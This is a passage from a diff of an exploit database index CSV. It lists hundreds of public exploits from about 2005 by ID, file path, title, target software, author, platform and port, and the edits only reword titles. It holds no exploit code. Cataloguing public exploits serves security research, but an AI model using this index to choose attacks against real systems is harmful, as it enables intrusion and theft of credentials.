Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0 @@ -581,59 +581,59 @@ id,file,description,date,author,platform,type,port 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 754,platforms/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,php,webapps,0 -755,platforms/windows/dos/755.c,"Breed patch #1 - Zero-Length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 +755,platforms/windows/dos/755.c,"Breed patch #1 - Zero-Length Remote Crash",2005-01-13,"Luigi Auriemma",windows,dos,7649 756,platforms/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Exploit (PoC)",2005-01-15,"Rafael Carrasco",linux,local,0 758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0 760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 -762,platforms/osx/dos/762.c,"Apple Mac OS X 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 +762,platforms/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 -766,platforms/osx/local/766.c,"Apple Mac OS X 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 +766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 -769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow Exploit",2005-01-24,ATmaCA,windows,local,0 +769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing",2005-01-24,ATmaCA,windows,dos,0 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 -772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (C)",2005-01-25,THUNDER,cgi,webapps,0 -773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (Perl)",2005-01-25,GHC,cgi,webapps,0 +772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0 +773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 775,platforms/linux/remote/775.c,"Berlios gpsd 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 -780,platforms/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 +780,platforms/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash",2005-01-31,"Luigi Auriemma",windows,dos,28015 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow (1)",2005-02-01,"Tal Zeltzer",windows,remote,80 782,platforms/windows/dos/782.pl,"TinyWeb 1.9 - Denial of Service",2005-02-01,karak0rsan,windows,dos,80 783,platforms/windows/dos/783.c,"Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow",2005-02-02,"Luigi Auriemma",windows,dos,0 -784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String Exploit",2005-02-03,CoKi,linux,remote,6667 +784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - socket_getline() Remote Buffer Overflow (2)",2005-02-03,cybertronic,linux,remote,119 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps,0 -787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow Exploit",2005-02-04,CorryL,windows,remote,80 +787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow",2005-02-04,CorryL,windows,remote,80 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0 789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0 791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 -793,platforms/osx/local/793.pl,"Apple Mac OS X - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 +793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 -795,platforms/osx/local/795.pl,"Apple Mac OS X Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 +795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service",2005-02-07,OYXin,windows,dos,0 -798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 -799,platforms/osx/dos/799.c,"Apple Mac OS X - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 +798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure",2005-02-08,Kozan,windows,local,0 +799,platforms/osx/dos/799.c,"Apple Mac OSX - AppleFileServer Remote Denial of Service",2005-02-08,nemo,osx,dos,0 800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote Exploit",2005-02-08,"ALBANIA SECURITY",php,webapps,0 801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin Exploit",2005-02-09,Silentium,php,webapps,0 802,platforms/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode Exploit",2005-02-09,ATmaCA,windows,remote,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 804,platforms/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,windows,remote,0 -805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell Exploit",2005-02-09,n4rk0tix,multiple,remote,8080 -806,platforms/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String Exploit",2005-02-09,"Serkan Akpolat",linux,remote,8080 +805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell",2005-02-09,n4rk0tix,multiple,remote,8080 +806,platforms/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String",2005-02-09,"Serkan Akpolat",linux,remote,8080 807,platforms/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,php,webapps,0 808,platforms/php/webapps/808.txt,"CMScore - SQL Injection",2005-02-10,GHC,php,webapps,0 809,platforms/php/webapps/809.txt,"Chipmunk Forums - SQL Injection",2005-02-10,GHC,php,webapps,0 -810,platforms/windows/dos/810.c,"Armagetron Advanced 0.2.7.0 - Server Crash Exploit",2005-02-10,"Luigi Auriemma",windows,dos,0 +810,platforms/windows/dos/810.c,"Armagetron Advanced 0.2.7.0 - Server Crash",2005-02-10,"Luigi Auriemma",windows,dos,0 811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0 812,platforms/linux/remote/812.c,"Exim 4.43 - 'auth_spa_server()' Remote Exploit (PoC)",2005-02-12,"Yuri Gushin",linux,remote,25 813,platforms/windows/dos/813.c,"Quake 3 Engine - Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 @@ -645,32 +645,32 @@ id,file,description,date,author,platform,type,port 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote Buffer Overflow (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 -823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 +823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203 -827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow Exploit",2005-02-18,class101,windows,remote,21 +827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Exploit",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803 832,platforms/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps,0 -833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 -834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 -835,platforms/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 -836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 -837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure Exploit",2005-02-23,Kozan,windows,local,0 +833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 +834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 +835,platforms/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 +836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local,0 +837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local,0 838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos,0 -839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 +839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0 843,platforms/windows/dos/843.c,"Knet 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 -844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0 +844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (asm)",2005-02-26,illwill,windows,local,0 845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 -846,platforms/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure Exploit",2005-02-27,Kozan,windows,local,0 +846,platforms/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure",2005-02-27,Kozan,windows,local,0 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 -848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure Exploit (asm)",2005-02-28,illwill,windows,local,0 +848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure (asm)",2005-02-28,illwill,windows,local,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 @@ -702,25 +702,25 @@ id,file,description,date,author,platform,type,port 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 880,platforms/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,php,webapps,0 -882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0 -883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow Exploit (2)",2005-04-24,cybertronic,windows,remote,2380 -884,platforms/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 -885,platforms/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 +882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash",2005-03-15,Komrade,windows,dos,0 +883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 +884,platforms/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure",2005-03-16,Kozan,windows,local,0 +885,platforms/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,windows,local,0 886,platforms/windows/dos/886.pl,"PlatinumFTP 1.0.18 - Multiple Remote Denial of Service",2005-03-17,ports,windows,dos,0 887,platforms/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service",2005-03-17,"Tal Zeltzer",windows,dos,0 888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service",2005-03-17,Ali7,windows,dos,0 889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer 1.3.21 - Denial of Service",2005-03-21,"Nico Spicher",windows,dos,0 -892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 +892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass (SQL Injection)",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3)",2005-03-22,sd,linux,local,0 -896,platforms/osx/local/896.c,"Apple Mac OS X 10.3.8 - 'CF_CHARSET_PATH' Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 +896,platforms/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server 0.4.2 - Denial of Service",2005-03-28,GreenwooD,windows,dos,0 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow",2005-03-28,infamous41md,linux,remote,25 -901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 +901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 904,platforms/linux/dos/904.c,"Linux Kernel 2.6.10 - Local Denial of Service",2005-03-29,ChoiX,linux,dos,0 @@ -736,9 +736,9 @@ id,file,description,date,author,platform,type,port 914,platforms/linux/local/914.c,"Aeon 0.2a - Local Linux Exploit (2)",2005-04-05,patr0n,linux,local,0 915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - Imapd Remote Exploit",2005-04-05,Expanders,linux,remote,143 916,platforms/windows/dos/916.pl,"MailEnable Enterprise 1.x - SMTP Remote Denial of Service",2005-04-05,CorryL,windows,dos,0 -918,platforms/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure Exploit",2005-04-06,Kozan,windows,local,0 -919,platforms/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 -920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 +918,platforms/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure",2005-04-06,Kozan,windows,local,0 +919,platforms/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure",2005-04-07,Kozan,windows,local,0 +920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure",2005-04-07,Kozan,windows,local,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 @@ -749,14 +749,14 @@ id,file,description,date,author,platform,type,port 927,platforms/windows/local/927.c,"Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow",2005-04-11,"Stuart Pearson",windows,local,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 929,platforms/windows/local/929.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 -930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption Exploit",2005-04-12,Skylined,windows,remote,0 +930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 932,platforms/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Buffer Overflow",2005-04-13,"Esteban Fayo",windows,local,0 933,platforms/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injections Exploits",2005-04-13,"Esteban Fayo",windows,local,0 -934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String Exploit",2005-04-13,Xpl017Elz,linux,remote,2525 -935,platforms/windows/local/935.c,"Morpheus 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0 -936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 -937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 +934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 +935,platforms/windows/local/935.c,"Morpheus 4.8 - Local Chat Passwords Disclosure",2005-04-13,Kozan,windows,local,0 +936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure",2005-04-13,Kozan,windows,local,0 +937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,windows,local,0 938,platforms/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 @@ -764,30 +764,30 @@ id,file,description,date,author,platform,type,port 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 -945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,80 +945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0 947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,windows,remote,80 950,platforms/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,linux,local,0 951,platforms/windows/local/951.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (2)",2005-04-22,"Jean Luc",windows,local,0 -952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow Exploit",2005-04-25,CorryL,windows,remote,8080 +952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow",2005-04-25,CorryL,windows,remote,8080 953,platforms/windows/remote/953.c,"Yager 5.24 - Remote Buffer Overflow",2005-04-25,cybertronic,windows,remote,1089 -954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 +954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0 955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow",2005-04-26,"Sergio Alvarez",windows,remote,21 956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos,0 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool 7.5.00.23 - Remote Stack Overflow",2005-04-27,cybertronic,windows,remote,9999 -963,platforms/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure Exploit",2005-04-28,Kozan,windows,local,0 -964,platforms/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 -965,platforms/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 -966,platforms/windows/local/966.c,"NotJustBrowsing 1.0.3 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 +963,platforms/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,windows,local,0 +964,platforms/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,windows,local,0 +965,platforms/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,windows,local,0 +966,platforms/windows/local/966.c,"NotJustBrowsing 1.0.3 - Local Password Disclosure",2005-04-28,Kozan,windows,local,0 967,platforms/windows/remote/967.cpp,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (1)",2005-04-29,ATmaCA,windows,remote,21 968,platforms/windows/remote/968.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (2)",2005-04-29,c0d3r,windows,remote,21 969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21 -970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String Exploit",2005-04-29,cybertronic,linux,remote,164 +970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164 971,platforms/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Privilege Escalation",2005-04-29,"Jerome Athias",windows,local,0 972,platforms/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",solaris,local,0 973,platforms/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",linux,local,0 @@ -797,8 +797,8 